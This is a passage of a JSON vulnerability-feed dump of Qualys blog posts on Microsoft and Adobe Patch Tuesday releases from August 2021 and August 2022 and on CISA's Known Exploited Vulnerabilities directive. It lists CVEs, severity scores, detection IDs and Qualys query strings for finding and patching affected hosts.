Access](<https://threatprotect.qualys.com/2022/08/03/vmware-patched-multiple-vulnerabilities-in-vmware-products-including-identity-manager-vidm-and-workspace-one-access/>)\n * [Atlassian Confluence Server and Confluence Data Center \u2013 Questions for Confluence 
App \u2013 Hardcoded Password Vulnerability (CVE-2022-26138)](<https://threatprotect.qualys.com/2022/08/01/atlassian-confluence-server-and-confluence-data-center-questions-for-confluence-app-hardcoded-password-vulnerability-cve-2022-26138/>)\n\n* * *\n\n## Discover and Prioritize Vulnerabilities in [Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) \n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its KnowledgeBase (KB). \n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n \n \n vulnerabilities.vulnerability:( qid:`50121` OR qid:`91929` OR qid:`91931` OR qid:`91932` OR qid:`91933` OR qid:`91934` OR qid:`91935` OR qid:`91936` OR qid:`110413` OR qid:`110414` OR qid:`376813` ) \n\n\n\n [A Deep Dive into VMDR 2.0 with Qualys TruRisk\u2122](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>) _The old way of ranking vulnerabilities doesn\u2019t work anymore. Instead, enterprise security teams need to rate the true risks to their business. In this blog, we examine each of the risk scores delivered by Qualys TruRisk, the criteria used to compute them, and how they can be used to prioritize remediation._\n\n* * *\n\n## Rapid Response with [Patch Management (PM)](<https://www.qualys.com/apps/patch-management/>)\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches for this Patch Tuesday:\n \n \n ( qid:`50121` OR qid:`91929` OR qid:`91931` OR qid:`91932` OR qid:`91933` OR qid:`91934` OR qid:`91935` OR qid:`91936` OR qid:`110413` OR qid:`110414` OR qid:`376813` ) \n\n\n\n [Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n* * *\n\n## Evaluate Vendor-Suggested Workarounds with [Policy Compliance](<https://www.qualys.com/forms/policy-compliance/>) _New Content_\n\nQualys\u2019 [Policy Compliance Control Library](<https://vimeo.com/700790353>) makes it easy to evaluate your technology infrastructure when the current situation requires the implementation of a vendor-suggested workaround. A workaround is a method, sometimes used temporarily, for achieving a task or goal when the usual or planned method isn't working. Information technology often uses a workaround to overcome hardware, programming, or communication problems. Once a problem is fixed, a workaround is usually abandoned. 
_ [Source](<https://www.techtarget.com/whatis/definition/workaround>)_\n\nThe following Qualys [Policy Compliance Control IDs (CIDs), and System Defined Controls (SDC) ](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/module_pc/controls/controls_lp.htm>)have been updated to support Microsoft recommended workaround for this Patch Tuesday:\n\n#### **[CVE-2022-35793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35793>) | Windows Print Spooler Elevation of Privilege (EoP) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 7.3/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 1368: Status of the \u2018Print Spooler\u2019 service\n * 21711: Status of the \u2018Allow Print Spooler to accept client connections\u2019 group policy setting \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### **[CVE-2022-35804](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35804>)** | **SMB Client and Server Remote Code Execution (RCE) Vulnerability**\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 24476: Status of the SMBv3 Client compressions setting\n * 20233: Status of the SMBv3 Server compressions setting \n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### ****[CVE-2022-35755](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35755>)** | **Windows Print Spooler Elevation of Privilege (EoP) Vulnerability****\n\nThis vulnerability has a CVSSv3.1 score of 7.3/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 1368: Status of the \u2018Print Spooler\u2019 service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation More Likely\n\n* * *\n\n#### 
**[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>)**, **[CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>)** | **Windows Point-to-Point Protocol (PPP) Remote Code Execution (RCE) Vulnerability** \n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 11220: List of \u2018Inbound Rules\u2019 configured in Windows Firewall with Advanced Security via GPO\n * 14028: List of \u2018Outbound Rules\u2019 configured in Windows Firewall with Advanced Security via GPO\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\n#### **[CVE-2022-34715](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715>): Windows Network File System Remote Code Execution (RCE) Vulnerability** \n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 24139: Status of the Windows Network File System (NFSV4) service\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\n#### ****[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>): Active Directory Domain Services Elevation of Privilege (EoP) Vulnerability****\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nPolicy Compliance Control IDs (CIDs):\n\n * 4079: Status of the \u2018Active Directory Certificate Service\u2019\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): Exploitation Less Likely\n\n* * *\n\nThe following QQL will return a posture assessment for the CIDs for this Patch Tuesday:\n \n \n control:( id:`1368` OR id:`4079` OR id:`11220` OR id:`14028` OR id:`20233` OR id:`21711` OR id:`24139` OR id:`24476` ) \n\n\n\n [Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating 
Controls](<https://blog.qualys.com/vulnerabilities-threat-research/2022/08/23/mitigating-the-risk-of-zero-day-vulnerabilities-by-using-compensating-controls>)\n\n [Policy Compliance (PC) | Policy Library Update Blogs](<https://notifications.qualys.com/tag/policy-library>)\n\n* * *\n\n##### Patch Tuesday is Complete.\n\n* * *\n\n# Qualys Monthly Webinar Series \n\n\n\nThe Qualys Research team hosts a monthly webinar series to help our existing customers leverage the seamless integration between Qualys[ Vulnerability Management Detection Response (VMDR)](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and Qualys [Patch Management](<https://www.qualys.com/apps/patch-management/>). Combining these two solutions can reduce the median time to remediate critical vulnerabilities. \n\nDuring the webcast, we will discuss this month\u2019s high-impact vulnerabilities, including those that are part of this month's Patch Tuesday alert. We will walk you through the necessary steps to address the key vulnerabilities using Qualys VMDR and Qualys Patch Management. 
\n\n* * *\n\n### **Join the webinar**\n\n## **This Month in Vulnerabilities & Patches**\n\n[Register Now](<https://gateway.on24.com/wcc/eh/3347108/category/97049/patch-tuesday>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-09T20:00:00", "type": "qualysblog", "title": "August 2022 Patch Tuesday | Microsoft Releases 121 Vulnerabilities with 17 Critical, plus 20 Microsoft Edge (Chromium-Based); Adobe Releases 5 Advisories, 25 Vulnerabilities with 15 Critical.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20827", "CVE-2022-20841", "CVE-2022-20842", "CVE-2022-22047", "CVE-2022-2294", "CVE-2022-26138", "CVE-2022-30133", "CVE-2022-30134", "CVE-2022-30190", "CVE-2022-31672", "CVE-2022-31673", "CVE-2022-31674", "CVE-2022-31675", "CVE-2022-33636", "CVE-2022-33646", "CVE-2022-33649", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34691", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35744", "CVE-2022-35755", "CVE-2022-35766", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35796", "CVE-2022-35804"], "modified": "2022-08-09T20:00:00", "id": 
"QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-21T10:10:11", "description": "### Microsoft Patch Tuesday \u2013 August 2021\n\nMicrosoft patched 51 vulnerabilities in their August 2021 Patch Tuesday release, and 7 of them are rated as critical severity. Three 0-day vulnerability patches were included in the release.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n\nAn unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate against another server using NTLM. A malicious user can use this attack to take complete control over windows domain Per Microsoft, this vulnerability affects all servers, but domain controllers should be prioritized in terms of applying security updates.\n\n[CVE-2021-34481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481>) \u2013 Windows Print Spooler Remote Code Execution Vulnerability\n\nA remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. 
This Patch Tuesday Microsoft released security updates to address this vulnerability and should be prioritized.\n\n#### Three 0-Day Vulnerabilities Patched\n\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>) - Windows Print Spooler Remote Code Execution Vulnerability\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>) - Windows Update Medic Service Elevation of Privilege Vulnerability - This has been actively exploited, per Microsoft.\n\n#### Qualys QIDs Providing Coverage\n\n**QID**| **Title**| **Severity**| **CVE ID** \n---|---|---|--- \n110388| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities August 2021| Medium| [_CVE-2021-36940_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36940>) \n110389| Microsoft Office and Microsoft Office Services and Web Apps Security Update August 2021 | High| [_CVE-2021-34478_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34478>), [_CVE-2021-36941_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36941>) \n375798| Microsoft Azure CycleCloud Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-33762_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33762>), [_CVE-2021-36943_](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36943>), [_KB3142345_](<https://www.microsoft.com/en-us/download/details.aspx?id=103313>) \n91801| Microsoft Dynamics Business Central Cross-Site (XSS) Scripting Vulnerability August 2021 | Medium | [_CVE-2021-36946_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36946>) \n91802| Microsoft Windows Security Update for August 2021 \n \n | High| CVE-2021-26424, [_CVE-2021-26425_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26425>), 
[_CVE-2021-26426_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26426>), [_CVE-2021-26431_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26431>), [_CVE-2021-26432_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26432>), [_CVE-2021-26433_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26433>), [_CVE-2021-34480_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34480>), [_CVE-2021-34483_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34483>), [_CVE-2021-34484_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34484>), [_CVE-2021-34486_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34486>), [_CVE-2021-34487_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34487>), [_CVE-2021-34530_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34530>), [_CVE-2021-34533_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34533>), [_CVE-2021-34534_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34534>), [_CVE-2021-34535_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34535>), [_CVE-2021-34536_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34536>), [_CVE-2021-34537_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34537>), [_CVE-2021-36926_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36926>), [_CVE-2021-36927_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36927>), [_CVE-2021-36932_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36932>), [_CVE-2021-36933_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36933>), [_CVE-2021-36936_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36936>), [_CVE-2021-36937_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36937>), [_CVE-2021-36938_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36938>), [_CVE-2021-36947_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36947>), 
[_CVE-2021-36948_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36948>) \n91803| Microsoft Windows Local Security Authority (LSA) Spoofing Vulnerability August 2021 | High| [_CVE-2021-36942_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36942>) \n91804| Microsoft Windows Defender Elevation of Privilege Vulnerability August 2021 | Medium| [_CVE-2021-34471_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34471>) \n91805| Microsoft Windows 10 Update Assistant Elevation of Privilege Vulnerability August 2021 | Medium | [_CVE-2021-36945_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36945>) \n91806| Microsoft Azure Active Directory Connect Authentication Bypass Vulnerability August 2021 | Medium| [_CVE-2021-36949_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36949>) \n91774| Microsoft .NET Core and ASP.NET Core Security Update for August 2021 | High| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n91809| Microsoft Visual Studio Security Update for August 2021 | Medium| [_CVE-2021-26423_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26423>), [_CVE-2021-34485_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34485>), [_CVE-2021-34532_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34532>) \n \n### Adobe Patch Tuesday \u2013 August 2021\n\nAdobe addressed 29 CVEs this Patch Tuesday impacting Adobe Connect and Magento product. 
The patches for Magento are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\n**Adobe Security Bulletin**| **QID**| **Severity**| **CVE ID** \n---|---|---|--- \nAdobe Connect Multiple Vulnerabilities (APSB21-66) | 730152| Medium| [CVE-2021-36061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36061>), [CVE-2021-36062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36062>), [CVE-2021-36063](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36063>) \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. 
You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91774` OR qid:`91801` OR qid:`91802` OR qid:`91803` OR qid:`91804` OR qid:`91805` OR qid:`91806` OR qid:`91809` OR qid:`375798` OR qid:`110389` OR qid:`110388` OR qid:`730152`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://success.qualys.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Vulnerabilities and Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/502309>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, August 2021\n * Adobe Patch Tuesday, August 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/502309>)\n\n[Webinar August 12, 2021 or on demand](<https://www.brighttalk.com/webcast/11673/502309>).\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T19:58:49", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (August 2021) \u2013 Microsoft 51 Vulnerabilities with 7 Critical, Adobe 29 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36061", "CVE-2021-36062", "CVE-2021-36063", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949"], "modified": "2021-08-10T19:58:49", "id": "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in 
November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. 
This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps the catalog\u2019s CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys KnowledgeBase and tags them with the RTI field \u201cCISA Exploited\u201d. This mapping is kept up to date because CISA frequently adds new CVEs to the catalog as part of its regular feeds.\n\nFor these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by prioritizing their remediation.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. CISA groups the remediation guidance into multiple categories based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. 
Since the directive includes 379 CVEs (as of February 22, 2022), we recommend searching with QQL (Qualys Query Language) rather than by individual CVE; the following query returns the QIDs Qualys has released for the catalog: **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and monitor remediation status in real time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities listed by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-10
